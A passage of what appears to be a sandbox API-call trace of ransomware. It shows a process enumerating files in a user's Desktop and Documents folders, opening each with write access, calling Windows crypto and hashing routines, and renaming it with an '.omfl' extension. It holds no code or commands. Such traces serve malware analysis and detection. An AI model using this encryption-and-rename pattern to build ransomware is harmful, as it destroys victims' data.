ftCreationTime.dwLowDateTime=0xb71f67b0, ftCreationTime.dwHighDateTime=0x1d5d811, ftLastAccessTime.dwLowDateTime=0xa0ff2080, ftLastAccessTime.dwHighDateTime=0x1d5dcba, ftLastWriteTime.dwLowDateTime=0xa0ff2080, ftLastWriteTime.dwHighDateTime=0x1d5dcba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.771] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\1DrGFfRFQbx.mkv") returned=".mkv" [0134.771] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\1DrGFfRFQbx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\1drgffrfqbx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.771] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=101103) returned 1 [0134.771] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.774] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2f78) returned 1 [0134.775] CryptCreateHash (in: hProv=0x49d2f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.775] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.775] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.775] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.775] GetLastError () returned 0x0 [0134.775] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.775] CryptReleaseContext (hProv=0x49d2f78, dwFlags=0x0) returned 1 [0134.775] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.775] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.775] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.777] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\1DrGFfRFQbx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\1drgffrfqbx.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\1DrGFfRFQbx.mkv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\1drgffrfqbx.mkv.omfl")) returned 1 [0134.778] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\A aI4J5E1.avi") returned=".avi" [0134.778] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\A aI4J5E1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\a ai4j5e1.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.778] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=47051) returned 1 [0134.778] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.781] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2f78) returned 1 [0134.782] CryptCreateHash (in: hProv=0x49d2f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.782] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.782] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.782] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.782] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.782] GetLastError () returned 0x0 [0134.782] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.782] CryptReleaseContext (hProv=0x49d2f78, dwFlags=0x0) returned 1 [0134.782] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.782] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.782] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.782] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.783] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\A aI4J5E1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\a ai4j5e1.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\A aI4J5E1.avi.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\a ai4j5e1.avi.omfl")) returned 1 [0134.784] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\HlxaW8tbH9B.jpg") returned=".jpg" [0134.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\HlxaW8tbH9B.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\hlxaw8tbh9b.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.784] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=38073) returned 1 [0134.784] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.787] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2f78) returned 1 [0134.788] CryptCreateHash (in: hProv=0x49d2f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.788] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.788] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.788] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.788] GetLastError () returned 0x0 [0134.788] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.788] CryptReleaseContext (hProv=0x49d2f78, dwFlags=0x0) returned 1 [0134.788] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.788] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.788] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.789] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\HlxaW8tbH9B.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\hlxaw8tbh9b.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\HlxaW8tbH9B.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\hlxaw8tbh9b.jpg.omfl")) returned 1 [0134.790] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\MfqYk8tUW4oGHiC7P.jpg") returned=".jpg" [0134.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\MfqYk8tUW4oGHiC7P.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\mfqyk8tuw4oghic7p.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.791] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=14388) returned 1 [0134.791] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.793] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2f78) returned 1 [0134.794] CryptCreateHash (in: hProv=0x49d2f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.794] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.794] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.794] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.794] GetLastError () returned 0x0 [0134.794] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.794] CryptReleaseContext (hProv=0x49d2f78, dwFlags=0x0) returned 1 [0134.794] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.794] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.794] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.795] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\MfqYk8tUW4oGHiC7P.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\mfqyk8tuw4oghic7p.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\MfqYk8tUW4oGHiC7P.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\1cfzl0dcoidsxuqjynmb\\mfqyk8tuw4oghic7p.jpg.omfl")) returned 1 [0134.796] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.796] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc0) returned 0x74e6bb8 [0134.796] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.796] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc0) returned 0x74e6c80 [0134.796] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.796] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\") returned="xj3kFMwlyq\\" [0134.796] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.796] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0b78 [0134.796] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\") returned="GG7LokQ3R5cq6 ylO\\" [0134.797] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.797] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\") returned="aFM0SjkBF-UdBxYLzMZ\\" [0134.797] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.797] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0134.797] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b648 [0134.797] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.797] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.797] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.797] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.797] PathFindFileNameW (pszPath="") returned="" [0134.797] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc0) returned 0x74e6c80 [0134.797] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92f482f0, ftCreationTime.dwHighDateTime=0x1d5e5ca, ftLastAccessTime.dwLowDateTime=0xb7d79d50, ftLastAccessTime.dwHighDateTime=0x1d5df26, ftLastWriteTime.dwLowDateTime=0xb7d79d50, ftLastWriteTime.dwHighDateTime=0x1d5df26, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.797] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\4n9OLw--M71.xlsx") returned=".xlsx" [0134.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\4n9OLw--M71.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\4n9olw--m71.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.797] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=16206) returned 1 [0134.798] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.800] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2f78) returned 1 [0134.801] CryptCreateHash (in: hProv=0x49d2f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.801] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.801] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.801] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.801] GetLastError () returned 0x0 [0134.801] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.801] CryptReleaseContext (hProv=0x49d2f78, dwFlags=0x0) returned 1 [0134.801] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.801] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.801] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.802] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\4n9OLw--M71.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\4n9olw--m71.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\4n9OLw--M71.xlsx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\4n9olw--m71.xlsx.omfl")) returned 1 [0134.803] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\5txqMV.doc") returned=".doc" [0134.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\5txqMV.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\5txqmv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.804] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=3026) returned 1 [0134.804] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.806] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2f78) returned 1 [0134.807] CryptCreateHash (in: hProv=0x49d2f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.807] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.807] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.807] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.807] GetLastError () returned 0x0 [0134.807] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.807] CryptReleaseContext (hProv=0x49d2f78, dwFlags=0x0) returned 1 [0134.807] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.807] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.807] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.808] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\5txqMV.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\5txqmv.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\5txqMV.doc.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\5txqmv.doc.omfl")) returned 1 [0134.809] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\654P6Bf.xls") returned=".xls" [0134.809] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\654P6Bf.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\654p6bf.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.809] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=15980) returned 1 [0134.809] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.812] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2f78) returned 1 [0134.813] CryptCreateHash (in: hProv=0x49d2f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.813] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.813] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.813] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.813] GetLastError () returned 0x0 [0134.813] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.813] CryptReleaseContext (hProv=0x49d2f78, dwFlags=0x0) returned 1 [0134.813] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.813] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.813] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.814] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\654P6Bf.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\654p6bf.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\654P6Bf.xls.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\654p6bf.xls.omfl")) returned 1 [0134.816] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\hWeeWikMxag79wT.pptx") returned=".pptx" [0134.816] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 